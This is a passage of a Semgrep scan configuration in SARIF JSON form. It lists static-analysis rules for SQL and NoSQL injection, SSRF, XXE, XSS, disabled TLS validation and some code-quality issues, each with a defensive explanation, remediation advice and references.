python.lang.file.tainted-path-traversal-stdlib.tainted-path-traversal-stdlib"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Create parameterized queries in pgx by using positional parameters (`$1`, `$2`, ...) and adding the values as additional arguments to the function call. It is also possible to create prepared statements through the `Prepare` function. This function uses the same placeholders for bound parameters."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Create parameterized queries in pgx by using positional parameters (`$1`, `$2`, ...) and adding the values as additional arguments to the function call. It is also possible to create prepared statements through the `Prepare` function. This function uses the same placeholders for bound parameters.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.grpc.sql.grpc-pgx-sqli-taint-med-conf.grpc-pgx-sqli-taint-med-conf)\n - [https://github.com/jackc/pgx](https://github.com/jackc/pgx)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://pkg.go.dev/github.com/jackc/pgx/v4#hdr-Connection_Pool](https://pkg.go.dev/github.com/jackc/pgx/v4#hdr-Connection_Pool)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Create parameterized queries in pgx by using positional parameters (`$1`, `$2`, ...) and adding the values as additional arguments to the function call. It is also possible to create prepared statements through the `Prepare` function. This function uses the same placeholders for bound parameters."},"helpUri":"https://semgrep.dev/r/go.grpc.sql.grpc-pgx-sqli-taint-med-conf.grpc-pgx-sqli-taint-med-conf","id":"go.grpc.sql.grpc-pgx-sqli-taint-med-conf.grpc-pgx-sqli-taint-med-conf","name":"go.grpc.sql.grpc-pgx-sqli-taint-med-conf.grpc-pgx-sqli-taint-med-conf","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.grpc.sql.grpc-pgx-sqli-taint-med-conf.grpc-pgx-sqli-taint-med-conf"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If possible, it is better to rely on automatic pinning in PyTorch to avoid undefined behavior and for efficiency"},"help":{"markdown":"If possible, it is better to rely on automatic pinning in PyTorch to avoid undefined behavior and for efficiency\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.python.automatic-memory-pinning.automatic-memory-pinning)\n - [https://pytorch.org/docs/stable/data.html#memory-pinning](https://pytorch.org/docs/stable/data.html#memory-pinning)\n","text":"If possible, it is better to rely on automatic pinning in PyTorch to avoid undefined behavior and for efficiency"},"helpUri":"https://semgrep.dev/r/trailofbits.python.automatic-memory-pinning.automatic-memory-pinning","id":"trailofbits.python.automatic-memory-pinning.automatic-memory-pinning","name":"trailofbits.python.automatic-memory-pinning.automatic-memory-pinning","properties":{"precision":"very-high","tags":["CWE-676: Use of Potentially Dangerous Function","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.python.automatic-memory-pinning.automatic-memory-pinning"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Iteration over a possibly empty map `$C`. This is likely a bug or redundant code"},"help":{"markdown":"Iteration over a possibly empty map `$C`. This is likely a bug or redundant code\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.go.iterate-over-empty-map.iterate-over-empty-map)\n - [https://blog.trailofbits.com/2019/11/07/attacking-go-vr-ttps/](https://blog.trailofbits.com/2019/11/07/attacking-go-vr-ttps/)\n","text":"Iteration over a possibly empty map `$C`. This is likely a bug or redundant code"},"helpUri":"https://semgrep.dev/r/trailofbits.go.iterate-over-empty-map.iterate-over-empty-map","id":"trailofbits.go.iterate-over-empty-map.iterate-over-empty-map","name":"trailofbits.go.iterate-over-empty-map.iterate-over-empty-map","properties":{"precision":"very-high","tags":["CWE-665: Improper Initialization","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.go.iterate-over-empty-map.iterate-over-empty-map"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-httplib2.tainted-flask-http-request-httplib2)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-httplib2.tainted-flask-http-request-httplib2","id":"python.flask.net.tainted-flask-http-request-httplib2.tainted-flask-http-request-httplib2","name":"python.flask.net.tainted-flask-http-request-httplib2.tainted-flask-http-request-httplib2","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.net.tainted-flask-http-request-httplib2.tainted-flask-http-request-httplib2"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"help":{"markdown":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.injection.tainted-url-host.tainted-url-host)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"helpUri":"https://semgrep.dev/r/php.lang.security.injection.tainted-url-host.tainted-url-host","id":"php.lang.security.injection.tainted-url-host.tainted-url-host","name":"php.lang.security.injection.tainted-url-host.tainted-url-host","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.injection.tainted-url-host.tainted-url-host"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.actix.nosql.mongodb-taint.mongodb-taint)\n - [https://docs.rs/mongodb/latest/mongodb/](https://docs.rs/mongodb/latest/mongodb/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"helpUri":"https://semgrep.dev/r/rust.actix.nosql.mongodb-taint.mongodb-taint","id":"rust.actix.nosql.mongodb-taint.mongodb-taint","name":"rust.actix.nosql.mongodb-taint.mongodb-taint","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.actix.nosql.mongodb-taint.mongodb-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` Beware, using a custom EntityResolver will render these settings useless and you will be responsible for handeling security in the implementation of you EntityResolver. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` Beware, using a custom EntityResolver will render these settings useless and you will be responsible for handeling security in the implementation of you EntityResolver. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.documentbuilderfactory-xxe-parameter-entity.documentbuilderfactory-xxe-parameter-entity)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` Beware, using a custom EntityResolver will render these settings useless and you will be responsible for handeling security in the implementation of you EntityResolver. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.documentbuilderfactory-xxe-parameter-entity.documentbuilderfactory-xxe-parameter-entity","id":"java.lang.security.xxe.documentbuilderfactory-xxe-parameter-entity.documentbuilderfactory-xxe-parameter-entity","name":"java.lang.security.xxe.documentbuilderfactory-xxe-parameter-entity.documentbuilderfactory-xxe-parameter-entity","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.documentbuilderfactory-xxe-parameter-entity.documentbuilderfactory-xxe-parameter-entity"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Dangerous client config used, ensure SSL verification"},"help":{"markdown":"Dangerous client config used, ensure SSL verification\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.lang.security.rustls-dangerous.rustls-dangerous)\n - [https://docs.rs/rustls/latest/rustls/client/struct.DangerousClientConfig.html](https://docs.rs/rustls/latest/rustls/client/struct.DangerousClientConfig.html)\n - [https://docs.rs/rustls/latest/rustls/client/struct.ClientConfig.html#method.dangerous](https://docs.rs/rustls/latest/rustls/client/struct.ClientConfig.html#method.dangerous)\n","text":"Dangerous client config used, ensure SSL verification"},"helpUri":"https://semgrep.dev/r/rust.lang.security.rustls-dangerous.rustls-dangerous","id":"rust.lang.security.rustls-dangerous.rustls-dangerous","name":"rust.lang.security.rustls-dangerous.rustls-dangerous","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: rust.lang.security.rustls-dangerous.rustls-dangerous"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. By setting a custom `EntityResolver` for all previous security configurations for are bypassed. It is your responsibility to handle security in the `EntityResolver` implementation instead. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. By setting a custom `EntityResolver` for all previous security configurations for are bypassed. It is your responsibility to handle security in the `EntityResolver` implementation instead. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xml-custom-entityresolver.xml-custom-entityresolver)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. By setting a custom `EntityResolver` for all previous security configurations for are bypassed. It is your responsibility to handle security in the `EntityResolver` implementation instead. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xml-custom-entityresolver.xml-custom-entityresolver","id":"java.lang.security.audit.xml-custom-entityresolver.xml-custom-entityresolver","name":"java.lang.security.audit.xml-custom-entityresolver.xml-custom-entityresolver","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xml-custom-entityresolver.xml-custom-entityresolver"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"TLS ceritificate validation is disabled. This could lead to a potential man-in-the-middle attack. This may be used for testing purposes but it is not considered safe in production deployments."},"help":{"markdown":"TLS ceritificate validation is disabled. This could lead to a potential man-in-the-middle attack. This may be used for testing purposes but it is not considered safe in production deployments.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.crypto.certificate.curl-disabled-cert-validation.curl-disabled-cert-validation)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"TLS ceritificate validation is disabled. This could lead to a potential man-in-the-middle attack. This may be used for testing purposes but it is not considered safe in production deployments."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.crypto.certificate.curl-disabled-cert-validation.curl-disabled-cert-validation","id":"cpp.lang.security.crypto.certificate.curl-disabled-cert-validation.curl-disabled-cert-validation","name":"cpp.lang.security.crypto.certificate.curl-disabled-cert-validation.curl-disabled-cert-validation","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.crypto.certificate.curl-disabled-cert-validation.curl-disabled-cert-validation"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application was found to use named persistent pasteboards, which Apple strongly discourages and were deprecated in iOS 10. The application should use shared containers to pass data to trusted applications deployed under the same developer account."},"help":{"markdown":"The application was found to use named persistent pasteboards, which Apple strongly discourages and were deprecated in iOS 10. The application should use shared containers to pass data to trusted applications deployed under the same developer account.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.lang.clipboard.named-pasteboard.swift-named-persistent-pasteboards)\n - [https://developer.apple.com/documentation/uikit/uipasteboard?language=swift](https://developer.apple.com/documentation/uikit/uipasteboard?language=swift)\n - [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0073/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0073/)\n","text":"The application was found to use named persistent pasteboards, which Apple strongly discourages and were deprecated in iOS 10. The application should use shared containers to pass data to trusted applications deployed under the same developer account."},"helpUri":"https://semgrep.dev/r/swift.lang.clipboard.named-pasteboard.swift-named-persistent-pasteboards","id":"swift.lang.clipboard.named-pasteboard.swift-named-persistent-pasteboards","name":"swift.lang.clipboard.named-pasteboard.swift-named-persistent-pasteboards","properties":{"precision":"very-high","tags":["CWE-477: Use of Obsolete Function","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: swift.lang.clipboard.named-pasteboard.swift-named-persistent-pasteboards"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.servletresponse-writer-xss-deepsemgrep.servletresponse-writer-xss-deepsemgrep)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input."},"helpUri":"https://semgrep.dev/r/java.servlets.security.servletresponse-writer-xss-deepsemgrep.servletresponse-writer-xss-deepsemgrep","id":"java.servlets.security.servletresponse-writer-xss-deepsemgrep.servletresponse-writer-xss-deepsemgrep","name":"java.servlets.security.servletresponse-writer-xss-deepsemgrep.servletresponse-writer-xss-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.servletresponse-writer-xss-deepsemgrep.servletresponse-writer-xss-deepsemgrep"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts. Please update your code to use either the JSENCODE method to escape URL parameters or the escape=\"true\" attribute on tags. Passing URL parameters directly into scripts and DOM sinks creates an opportunity for Cross-Site Scripting attacks. Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts."},"help":{"markdown":"To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts. Please update your code to use either the JSENCODE method to escape URL parameters or the escape=\"true\" attribute on tags. Passing URL parameters directly into scripts and DOM sinks creates an opportunity for Cross-Site Scripting attacks. Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.visualforce.security.ncino.vf.xssfromunescapedurlparam.xss-from-unescaped-url-param)\n - [https://developer.salesforce.com/docs/atlas.en-us.apexcode.meta/apexcode/pages_security_tips_xss.htm](https://developer.salesforce.com/docs/atlas.en-us.apexcode.meta/apexcode/pages_security_tips_xss.htm)\n","text":"To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts. Please update your code to use either the JSENCODE method to escape URL parameters or the escape=\"true\" attribute on tags. Passing URL parameters directly into scripts and DOM sinks creates an opportunity for Cross-Site Scripting attacks. Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts."},"helpUri":"https://semgrep.dev/r/generic.visualforce.security.ncino.vf.xssfromunescapedurlparam.xss-from-unescaped-url-param","id":"generic.visualforce.security.ncino.vf.xssfromunescapedurlparam.xss-from-unescaped-url-param","name":"generic.visualforce.security.ncino.vf.xssfromunescapedurlparam.xss-from-unescaped-url-param","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: generic.visualforce.security.ncino.vf.xssfromunescapedurlparam.xss-from-unescaped-url-param"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"os.preadv() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use a combination of os.readv() and os.pread()."},"help":{"markdown":"os.preadv() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use a combination of os.readv() and os.pread().\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-os1)\n","text":"os.preadv() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use a combination of os.readv() and os.pread()."},"helpUri":"https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-os1","id":"python.lang.compatibility.python37.python37-compatibility-os1","name":"python.lang.compatibility.python37.python37-compatibility-os1","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: python.lang.compatibility.python37.python37-compatibility-os1"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a go-pg SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead of string concatenation. You can use parameterized queries like so: '(SELECT ? FROM table, data1)'"},"help":{"markdown":"Detected string concatenation with a non-literal variable in a go-pg SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead of string concatenation. You can use parameterized queries like so: '(SELECT ? FROM table, data1)'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.sqli.pg-sqli.pg-sqli)\n - [https://pg.uptrace.dev/](https://pg.uptrace.dev/)\n - 